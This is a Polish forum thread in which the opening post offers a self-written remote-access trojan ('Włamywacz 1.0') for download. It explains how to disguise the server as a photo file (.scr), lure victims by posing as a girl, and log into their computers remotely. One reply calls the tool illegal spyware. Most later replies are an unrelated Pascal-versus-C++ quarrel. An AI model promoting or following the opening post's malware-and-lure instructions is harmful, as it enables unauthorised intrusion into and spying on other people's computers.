Dodaj do ulubionych

Włamywacz 1.0 !! włam się na kompa komuś :)) !

10.02.08, 15:06
Witam

Właśnie ukończyłem prace nad programem do włamywania się innym na komputer :)))
chciałbym się tym programem z wami podzielić:)

tutaj jest Link:
www.speedyshare.com/754134658.html
Opis programu:
program składa się z 3 elementów:
1. Serwer (Fotka.scr)
2. Client
3. Generator

Ad.1 - Serwer
w katalogu "Serwer" znajdują się 2 pliki Fotka.Scr i Generator.Exe.
Fotka.Scr to jest serwer, który trzeba podesłąć ofierze(można się podać za
fajną dziewczynę i podesłać komuś fotke :) ).
Ale zanim podeślemy komuś fotkę to trzeba ją pierwsze zarejestrować... otóż
włączamy program Generator i tam wpisujemy Login i Hasło na tą fotke po czym
klikamy przycisk "Generuj".
kiedy już fotka zostanie wygenerowana to wysyłamy ją ofierze.

Ad.2 - Client
Client to program za pomocą, którego będziemy mogli grzebać komuś po kompie :)
po włączeniu klienta musimy się pierwsze zalogować na serwer, który sobie
stworzyliśmy (chodzi o tą fotke.scr). aby się zalogować na serwer to wpisujemy
polecenie: LOGIN "tu podajemy login jaki wygenerowaliśmy" i klikamy enter, a
następnie wpisujemy PASSWORD "tu wpisujemy password ten co generowaliśmy" i
znowu wciskamy enter i w taki sposób zalogujemy się na komputer ofiary :)))
podam przykład:
Login "komp001"
Password "orzeszek12"
te nazwy mają być wpisane w cudzysłowiu !

reszte poleceń które będziecie wpisywać znajdziecie w paczce z programem :)

i jak się program podoba ?? proszę o komentarze ! :)
Obserwuj wątek
    • m4ci3k3 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 10.06.08, 22:16
      mogla byś wysłać nowy link z tym programem??
      • morten_smart Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 29.12.08, 19:07
        Mam nadzieje, że tylko w celu podpatrzenia jak działa :P
    • payl Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 29.12.08, 19:36
      Moim zdaniem to ŻALOWSKI program typu spyware. Jest to nie zgodne z Polskim prawem tak do twojej wiadowości, a poza tym ten program jest BEZNADZIEJNY bo wymaga podesłania pliku z roszerzeniem .scr co odpowiada wygaszaczom ekranu, czyli jakby niepatrzeć plików typu EXE, czy COM. Zrób jekieś PRZYDATNE I NIESZKODLIWE oprogramowanie to porozmawiamy...

Może ktoś powie że się nie znam, ale coś o tym wiem bo programuje w Pascalu (Który jest 50x lepszy niż np. C++ ).

Ps. Sam napisałem 2 wirusy ......
      • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 03.02.09, 20:28
        "Może ktoś powie że się nie znam, ale coś o tym wiem bo programuje w Pascalu
        (Który jest 50x lepszy niż np. C++)."

To zdanie powaliło mnie na łopatki. Człowieku, na podstawie czego takie opinie
        głosisz? Jeśli uważasz, że Pascal jest lepszy od C++ to znaczy, że nigdy nie
        zetknąłeś się z tym językiem.
        • payl Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 03.02.09, 21:45
          Wiem że "wszyscy" tak uważają. C++ jest BARDZO popularny, Pascal troche mniej. Wiesz, właśnie uczę się C++, jest "w miare". Pascal ma bardzo prostą składnię, niepokomlikowaną jak w C++. W C++ ja się niezbyt łapię, bo 2 podbne kody robią zupełnie coś innego. Jak dlamnie Pascal jest dobry też bo ma Free Pascal który bardzo szybko kompiluje. W C++ prosty kod kompilował się latami.
          Więc mi niemów że nieznam C++ - znam go. I będę używał Pascala. Zresztą każdy ma swój ulubiony język programowania, więc mnie nie krytykuj. I będe dalej pisać: Pascal the BEST.
          • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 03.02.09, 22:14
            Gdybyś napisał: "WEDŁUG MNIE Pascal jest x razy lepszy, lepiej mi się z nim
            pracuje itp", to absolutnie nie miałbym nic do zarzucenia. Natomiast
            stwierdzeniem, że "jest lepszy" narażasz się na takie odpowiedzi jak moja.
            Nasuwa mi się jeden wniosek, jesteś dzieciakiem 10-13 lat. Znasz trochę Pascala
            i nic poza tym. Najpierw piszesz, że właśnie uczysz się C++, a pod koniec "Więc
            mi niemów że nieznam C++ - znam go". Prawda taka, że nie znasz zupełnie C++.
            Jeśli chcesz wyrażać opinie na temat tych języków, to najpierw oba dobrze poznaj.

A jeszcze coś. Wypadałoby czasem zerknąć do słownika, pouczyć się podstaw
            ortografii.

Na koniec proponuję zająć się C, jak starczy Ci zapału to zostaw na potem C++.
            • payl Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 04.02.09, 15:17
              Twierdzisz że jestem jako taki z Pascala. Sorka, ale Pascal znam na wylot (prawie :D ). C++ nie znam zbytnio, ale znam postawy jego składni. Myślałem że to oczywiste, że jak pisze że jest lepszy, to mi się z nim lepiej pracuje. Niechce się z tobą kłucić, bo My się kłucimy bez powodu. Ty wolisz C++, ja Pascal. I koniec. Sorka za błędy ortograficzne, ale się śpieszę. Nie wmówisz Mi że C++ jest lepszy.
              • humanistyka Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 04.02.09, 16:28
                Owszem, Pascal, a wlasciwie Object Pascal to doskonaly jezyk dla
                poczatkujacych programistow, w sam raz do nauki. Ale nie do
                tworzenia powaznych aplikacji. Powazne programy pisze sie w C++, C#,
                Java...
                • payl Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 05.02.09, 19:20
                  A ja się pytam: Kto powiedział że w Pascalu niemożna pisać poważnych aplikacji???? Pascal to idealny język do nauki programowania, ale też w co większość osób niewieży, idealny język do poważnych aplikacji. Jeśli mi niewieżycie to powiedzcie czego w Pascalu (Dokładniej w FPC) niema, a jest w C++ (Poza tym że w Pascalu brakuje wielu bibliotek bo nikt ich niepisze).
                  • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 07.02.09, 14:03
                    Większość (prawie wszystkie) OS'ów pisana jest za pomocą C/C++, podobnie jest z
                    grami kompuerowymi. Proszę podaj przykłady tych poważnych aplikacji wykonanych w
                    Pascalu. Nie znam osobiście nikogo, kto po poznaniu C/C++/Java dalej bawiłby się
                    w pascala. Pocieszę Cię. Kiedyś, na początku lat 90'tych, byłem zafascynowany
                    Basic'iem ;) Ale nie przyszłoby mi do głowy głosić opinie, że basic jest lepszy
                    od c albo c++. Pytanie dlaczego? Dlatego bo tych dwóch języków nie znałem.
                    Podobnie jest z Tobą. Z tą różnicą, że wypowiadasz się o czymś czego nie znasz...
                    • payl Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 08.02.09, 16:28
                      Wiem że nikt nie pisze gier w Pascalu ani tym bardziej Basicu :). Ja się pytam DLACZEGO?? Pascal ma prostą składnię, i wszystko to co w C/C++. No może poza bibliotekami, BO NIKT ICH NIEPISZE.
                      • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 08.02.09, 17:21
                        Według Ciebie Pascal to wspaniały (lepszy od C/C++) język, w którym można pisać
                        poważne aplikacje. A to że nikt tego nie robi, to po prostu kwestia
                        popularności? Ciekawa logika. Jeśli masz zamiar zajmować się programowaniem na
                        poważnie, to zmienisz zdanie szybciej niż myślisz.
                        • payl Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 09.02.09, 11:36
                          Nie mówie że pisanie poważnych aplikacji to tylko kwestia popularności. Chodzi też o budowe składni która musi być "mocna". Dlatego Basic który był popularny już niejest :). Pascal ma dobrą składnię, a C++ zbyt dziwną jak dla mnie :). C++ jest popularniejszy, a to ma wpływ, gdyż jest na niego więcej modułów itp. Może skończmy tą gadkę, bo Ty wolisz C++, a Ja Pascal. I nic na to nie poradzisz :). Więc nie będe odpowiadał na Twoje nastempne posty.
                          • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 14.02.09, 12:19
                            Liczyłem, że olśnisz mnie tymi poważnymi aplikacjami pisanymi w Pascalu.
                            Niestety przeliczyłem się. Ciągle piszesz o składni. Powiem Ci, że sama składnia
                            nie ma większego znaczenia. Może być jedynie mniej lub trochę bardziej wygodna.
                            Kwestia gustu. Znajomość składni języka, nie oznacza że umiesz się nim sprawnie
                            posługiwać. Gdyby tak było, to w ciągu dnia każdy mógłby zostać programistą.

Widzę, że nie bardzo wiesz jak wybrnąć z niewygodnej dla Ciebie sytuacji.
                            Dlatego po prostu na przyszłość uważaj co piszesz... I nie ograniczaj się do
                            Pascala ;)
                            • 13ty_smok Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 18.02.09, 14:21
                              lukasx1984, jak widzę też się zapędziłeś w wysławianiu się, jeżeli ktoś (np.
                              payl) nie jest w stanie podać żadnego przykładu poważnej aplikacji napisanej w
                              Pascalu wcale nie oznacza że takich aplikacji niema. Ja mogę podać przykład -
                              www.clear.com.pl/system-clear-pro/index.php
                              Programista który to stworzył świetnie zna C/C++ a mimo to napisał ten program w
                              pascalu. Są pewne przewagi Pascala nad C++ których payl nie wymienił, mimo to
                              nie twierdze że Pascal jest lepszy. Każde twierdzenie że coś jest lepsze od
                              czegoś powinno też odpowiadać na pytanie: do czego? Obrazując: czy śruba jest
                              lepsza od gwoździa? Odpowiedź na to pytanie zależy od tego do jakich celów ma
                              być użyta/użyty. Opinii w stylu payl'a nie są właściwie opiniami, zaś wyrazem
                              frustracji, spowodowanej niezdolnością opanowania innego narzędzia.
                              • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 19.02.09, 15:33
                                13ty_smok, jeśli payl pisze: "Może ktoś powie że się nie znam, ale coś o tym
                                wiem bo programuje w Pascalu (Który jest 50x lepszy niż np. C++ ).", to
                                wypadałoby żeby poparł to obiektywnymi, racjonalnymi argumentami. Okazuje się,
                                że opinie payla to dziecięce "widzimisie" a jego jedynym argumentem jest
                                składnia, co nie jest żadnym argumentem...
                                Aplikacje pisane w Pascalu pewnie są, tylko zdaje się, że ciężko je znaleźć.
                                Natomiast z tych pisanych w C/C++ korzystamy na codzień ;) Czy tylko dlatego, że
                                C/C++ są bardziej popularne? Można dyskutować w nieskończoność. Wypadałoby, żeby
                                opinie bazowały na wiedzy, doświadczeniu dotyczącego danego tematu. Bazowanie na
                                niewiedzy to trochę błądzenie w gęstej mgle, ktoś coś tam gdzieś usłyszał i coś
                                mu się wydaje...
                                • 13ty_smok Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 19.02.09, 15:47
                                  lukasx1984,
                                  "wypadałoby żeby poparł to obiektywnymi, racjonalnymi argumentami"
                                  To nadal za mało, powiedz mi - lepiej mieć psa czy kota, i spróbuj poprzeć to
                                  racjonalnymi argumentami. Dla jednego lepiej psa a dla kogoś innego lepiej kota.
                                  Do wypowiedzi payl'a: "Który jest 50x lepszy niż np. C++" dopisz "dla pisania
                                  programów przez payl'a" i wszystko wstaje na swoje miejsca.
                                  • lukasx1984 Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 19.02.09, 16:46
                                    Gdy przeczytasz początek dyskusji z paylem, to zauważysz że właśnie od tego się
                                    zaczęło. Według mnie powinienbył sprecyzować swoją wypowiedź dotyczącą
                                    50-krotnej wyższości Pascala nad C++. Nie napisał, że jemu lepiej się programuje
                                    w Pascalu, bo np się przyzwyczaił do tego języka i jest mu z tym dobrze. Gdyby
                                    tak było, to tej dyskusji by nie było. A jeśli stwierdza ogólną porażającą
                                    wyższość Pascala, to ja widząc bezsens wypowiedzi oczekuję, że poda mi na to
                                    argumenty. Nie chodzi tu już o samego kota, psa, Pascala czy C. Chodzi o to,
                                    żeby człowiek czasem pomyślał o tym co i jak ma zamiar napisać...
                                    • 13ty_smok Re: Włamywacz 1.0 !! włam się na kompa komuś :)) 20.02.09, 00:39
                                      Ludzi nie zawszę pamiętają o tym że myślenie nie boli. ;-D

Nie masz jeszcze konta? Zarejestruj się

Nie pamiętasz hasła lub ?

Nakarm Pajacyka